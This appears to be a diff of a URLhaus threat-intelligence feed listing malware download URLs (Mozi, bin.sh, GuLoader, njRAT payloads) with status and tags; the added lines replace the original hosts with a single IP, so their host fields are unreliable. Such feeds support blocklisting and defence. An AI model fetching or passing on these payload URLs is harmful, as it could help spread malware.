-{"id":"960955","urlhaus_reference":"https://urlhaus.abuse.ch/url/960955/","url":"http://116.75.192.72:39724/Mozi.m","url_status":"offline","host":"116.75.192.72","date_added":"2021-01-14 16:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960956","urlhaus_reference":"https://urlhaus.abuse.ch/url/960956/","url":"http://117.213.43.181:60804/Mozi.m","url_status":"offline","host":"117.213.43.181","date_added":"2021-01-14 16:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960953","urlhaus_reference":"https://urlhaus.abuse.ch/url/960953/","url":"http://123.5.149.145:51949/Mozi.m","url_status":"online","host":"123.5.149.145","date_added":"2021-01-14 16:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960954","urlhaus_reference":"https://urlhaus.abuse.ch/url/960954/","url":"http://125.41.114.210:48224/Mozi.m","url_status":"online","host":"125.41.114.210","date_added":"2021-01-14 16:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960952","urlhaus_reference":"https://urlhaus.abuse.ch/url/960952/","url":"http://113.201.171.61:37716/Mozi.m","url_status":"online","host":"113.201.171.61","date_added":"2021-01-14 16:04:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960951","urlhaus_reference":"https://urlhaus.abuse.ch/url/960951/","url":"http://101.108.135.252:60524/Mozi.m","url_status":"offline","host":"101.108.135.252","date_added":"2021-01-14 16:04:05 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961008","urlhaus_reference":"https://urlhaus.abuse.ch/url/961008/","url":"http://89.160.20.156:45117/bin.sh","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:25:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"961007","urlhaus_reference":"https://urlhaus.abuse.ch/url/961007/","url":"http://89.160.20.156:41485/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:22:16 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961006","urlhaus_reference":"https://urlhaus.abuse.ch/url/961006/","url":"http://89.160.20.156:43851/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:22:15 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961005","urlhaus_reference":"https://urlhaus.abuse.ch/url/961005/","url":"http://89.160.20.156:37095/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:22:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961004","urlhaus_reference":"https://urlhaus.abuse.ch/url/961004/","url":"http://89.160.20.156:59275/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:22:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
+{"id":"961002","urlhaus_reference":"https://urlhaus.abuse.ch/url/961002/","url":"http://89.160.20.156:46131/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961003","urlhaus_reference":"https://urlhaus.abuse.ch/url/961003/","url":"http://89.160.20.156:40129/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961000","urlhaus_reference":"https://urlhaus.abuse.ch/url/961000/","url":"http://89.160.20.156:43924/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:21:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961001","urlhaus_reference":"https://urlhaus.abuse.ch/url/961001/","url":"http://89.160.20.156:38851/i","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:21:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"960996","urlhaus_reference":"https://urlhaus.abuse.ch/url/960996/","url":"http://89.160.20.156:33008/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960997","urlhaus_reference":"https://urlhaus.abuse.ch/url/960997/","url":"http://89.160.20.156:60201/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:21:04 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960998","urlhaus_reference":"https://urlhaus.abuse.ch/url/960998/","url":"http://89.160.20.156:41479/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960999","urlhaus_reference":"https://urlhaus.abuse.ch/url/960999/","url":"http://89.160.20.156:52003/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960995","urlhaus_reference":"https://urlhaus.abuse.ch/url/960995/","url":"http://89.160.20.156:39500/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:20:16 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960994","urlhaus_reference":"https://urlhaus.abuse.ch/url/960994/","url":"http://89.160.20.156:36966/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:20:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960991","urlhaus_reference":"https://urlhaus.abuse.ch/url/960991/","url":"http://89.160.20.156:59875/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:20:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
+{"id":"960992","urlhaus_reference":"https://urlhaus.abuse.ch/url/960992/","url":"http://89.160.20.156:44123/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:20:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960993","urlhaus_reference":"https://urlhaus.abuse.ch/url/960993/","url":"http://89.160.20.156:45224/Mozi.a","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:20:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960990","urlhaus_reference":"https://urlhaus.abuse.ch/url/960990/","url":"http://89.160.20.156:43105/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:20:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960984","urlhaus_reference":"https://urlhaus.abuse.ch/url/960984/","url":"http://89.160.20.156:46011/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960985","urlhaus_reference":"https://urlhaus.abuse.ch/url/960985/","url":"http://89.160.20.156:51170/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960986","urlhaus_reference":"https://urlhaus.abuse.ch/url/960986/","url":"http://89.160.20.156:38025/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:20:06 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960987","urlhaus_reference":"https://urlhaus.abuse.ch/url/960987/","url":"http://89.160.20.156:54132/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960988","urlhaus_reference":"https://urlhaus.abuse.ch/url/960988/","url":"http://89.160.20.156:57705/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960989","urlhaus_reference":"https://urlhaus.abuse.ch/url/960989/","url":"http://89.160.20.156:32983/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960983","urlhaus_reference":"https://urlhaus.abuse.ch/url/960983/","url":"http://89.160.20.156:47908/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:19:13 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960982","urlhaus_reference":"https://urlhaus.abuse.ch/url/960982/","url":"http://89.160.20.156:35116/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:19:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
+{"id":"960978","urlhaus_reference":"https://urlhaus.abuse.ch/url/960978/","url":"http://89.160.20.156:38070/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960979","urlhaus_reference":"https://urlhaus.abuse.ch/url/960979/","url":"http://89.160.20.156:53399/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960980","urlhaus_reference":"https://urlhaus.abuse.ch/url/960980/","url":"http://89.160.20.156:39529/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960981","urlhaus_reference":"https://urlhaus.abuse.ch/url/960981/","url":"http://89.160.20.156:33465/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960977","urlhaus_reference":"https://urlhaus.abuse.ch/url/960977/","url":"http://89.160.20.156:59085/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:16:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"07ac0n","larted":"true","tags":["elf","Mozi"]} +{"id":"960976","urlhaus_reference":"https://urlhaus.abuse.ch/url/960976/","url":"http://89.160.20.156:33799/i","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:09:05 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"960972","urlhaus_reference":"https://urlhaus.abuse.ch/url/960972/","url":"http://89.160.20.156:40430/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:07:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960973","urlhaus_reference":"https://urlhaus.abuse.ch/url/960973/","url":"http://89.160.20.156:43006/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:07:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960974","urlhaus_reference":"https://urlhaus.abuse.ch/url/960974/","url":"http://89.160.20.156:33385/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:07:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960975","urlhaus_reference":"https://urlhaus.abuse.ch/url/960975/","url":"http://89.160.20.156:56649/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:07:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960971","urlhaus_reference":"https://urlhaus.abuse.ch/url/960971/","url":"http://89.160.20.156:55457/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:07:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
+{"id":"960968","urlhaus_reference":"https://urlhaus.abuse.ch/url/960968/","url":"http://89.160.20.156:52314/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960969","urlhaus_reference":"https://urlhaus.abuse.ch/url/960969/","url":"http://89.160.20.156:41985/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960970","urlhaus_reference":"https://urlhaus.abuse.ch/url/960970/","url":"http://89.160.20.156:53197/i","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"960967","urlhaus_reference":"https://urlhaus.abuse.ch/url/960967/","url":"http://89.160.20.156:54472/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:06:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960966","urlhaus_reference":"https://urlhaus.abuse.ch/url/960966/","url":"http://89.160.20.156:38100/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:06:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960964","urlhaus_reference":"https://urlhaus.abuse.ch/url/960964/","url":"http://89.160.20.156:33121/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:06:05 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960965","urlhaus_reference":"https://urlhaus.abuse.ch/url/960965/","url":"http://89.160.20.156:39363/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960961","urlhaus_reference":"https://urlhaus.abuse.ch/url/960961/","url":"http://89.160.20.156:42844/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960962","urlhaus_reference":"https://urlhaus.abuse.ch/url/960962/","url":"http://89.160.20.156:45789/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960963","urlhaus_reference":"https://urlhaus.abuse.ch/url/960963/","url":"http://89.160.20.156:34080/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960960","urlhaus_reference":"https://urlhaus.abuse.ch/url/960960/","url":"http://89.160.20.156:56067/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:05:11 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
+{"id":"960959","urlhaus_reference":"https://urlhaus.abuse.ch/url/960959/","url":"http://89.160.20.156:34205/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:05:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960957","urlhaus_reference":"https://urlhaus.abuse.ch/url/960957/","url":"http://89.160.20.156:53239/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:05:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960958","urlhaus_reference":"https://urlhaus.abuse.ch/url/960958/","url":"http://89.160.20.156:53868/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:05:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960955","urlhaus_reference":"https://urlhaus.abuse.ch/url/960955/","url":"http://89.160.20.156:39724/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960956","urlhaus_reference":"https://urlhaus.abuse.ch/url/960956/","url":"http://89.160.20.156:60804/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960953","urlhaus_reference":"https://urlhaus.abuse.ch/url/960953/","url":"http://89.160.20.156:51949/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:05:05 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960954","urlhaus_reference":"https://urlhaus.abuse.ch/url/960954/","url":"http://89.160.20.156:48224/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960952","urlhaus_reference":"https://urlhaus.abuse.ch/url/960952/","url":"http://89.160.20.156:37716/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:04:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960951","urlhaus_reference":"https://urlhaus.abuse.ch/url/960951/","url":"http://89.160.20.156:60524/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} {"id":"960946","urlhaus_reference":"https://urlhaus.abuse.ch/url/960946/","url":"http://urlfrance.fr/code/dd.txt","url_status":"offline","host":"urlfrance.fr","date_added":"2021-01-14 16:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"abused_legit_malware","surbl":"not listed"},"reporter":"abuse_ch","larted":"true","tags":["Encoded","njRAT","rat"]} -{"id":"960947","urlhaus_reference":"https://urlhaus.abuse.ch/url/960947/","url":"http://136.34.57.224:49988/bin.sh","url_status":"online","host":"136.34.57.224","date_added":"2021-01-14 16:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} 
-{"id":"960948","urlhaus_reference":"https://urlhaus.abuse.ch/url/960948/","url":"http://115.50.64.136:42857/Mozi.m","url_status":"online","host":"115.50.64.136","date_added":"2021-01-14 16:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960949","urlhaus_reference":"https://urlhaus.abuse.ch/url/960949/","url":"http://200.52.228.27:44751/bin.sh","url_status":"offline","host":"200.52.228.27","date_added":"2021-01-14 16:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} -{"id":"960950","urlhaus_reference":"https://urlhaus.abuse.ch/url/960950/","url":"http://115.63.203.134:47719/Mozi.m","url_status":"online","host":"115.63.203.134","date_added":"2021-01-14 16:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960945","urlhaus_reference":"https://urlhaus.abuse.ch/url/960945/","url":"http://181.194.120.182:38133/Mozi.m","url_status":"offline","host":"181.194.120.182","date_added":"2021-01-14 15:59:12 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"07ac0n","larted":"true","tags":["elf","Mozi"]} +{"id":"960947","urlhaus_reference":"https://urlhaus.abuse.ch/url/960947/","url":"http://89.160.20.156:49988/bin.sh","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"960948","urlhaus_reference":"https://urlhaus.abuse.ch/url/960948/","url":"http://89.160.20.156:42857/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:04:04 
UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960949","urlhaus_reference":"https://urlhaus.abuse.ch/url/960949/","url":"http://89.160.20.156:44751/bin.sh","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} +{"id":"960950","urlhaus_reference":"https://urlhaus.abuse.ch/url/960950/","url":"http://89.160.20.156:47719/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:04:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"960945","urlhaus_reference":"https://urlhaus.abuse.ch/url/960945/","url":"http://89.160.20.156:38133/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 15:59:12 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"07ac0n","larted":"true","tags":["elf","Mozi"]} {"id":"960944","urlhaus_reference":"https://urlhaus.abuse.ch/url/960944/","url":"http://www.sowetoson.com/new/Host_yjwloaz52.bin","url_status":"online","host":"www.sowetoson.com","date_added":"2021-01-14 15:57:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"abused_legit_malware","surbl":"not listed"},"reporter":"abuse_ch","larted":"true","tags":["encrypted","GuLoader"]} {"id":"960942","urlhaus_reference":"https://urlhaus.abuse.ch/url/960942/","url":"https://www.agamagroup.com.ng/zxc/janomo_uGdNtpvRY170.bin","url_status":"online","host":"www.agamagroup.com.ng","date_added":"2021-01-14 15:57:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"abused_legit_malware","surbl":"not 
listed"},"reporter":"abuse_ch","larted":"true","tags":["encrypted","GuLoader"]} {"id":"960943","urlhaus_reference":"https://urlhaus.abuse.ch/url/960943/","url":"https://onedrive.live.com/download?cid=8FE9EB3F9398B325&resid=8FE9EB3F9398B325%21126&authkey=AOzL9FiDhEYRkm8","url_status":"online","host":"onedrive.live.com","date_added":"2021-01-14 15:57:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"abuse_ch","larted":"true","tags":["encrypted","GuLoader"]} -{"id":"960941","urlhaus_reference":"https://urlhaus.abuse.ch/url/960941/","url":"http://59.93.22.84:46462/Mozi.m","url_status":"offline","host":"59.93.22.84","date_added":"2021-01-14 15:52:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960940","urlhaus_reference":"https://urlhaus.abuse.ch/url/960940/","url":"http://59.95.173.7:39046/Mozi.m","url_status":"offline","host":"59.95.173.7","date_added":"2021-01-14 15:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960934","urlhaus_reference":"https://urlhaus.abuse.ch/url/960934/","url":"http://42.224.66.103:47418/Mozi.m","url_status":"online","host":"42.224.66.103","date_added":"2021-01-14 15:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"960935","urlhaus_reference":"https://urlhaus.abuse.ch/url/960935/","url":"http://42.228.37.137:42287/Mozi.m","url_status":"online","host":"42.228.37.137","date_added":"2021-01-14 15:52:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} 
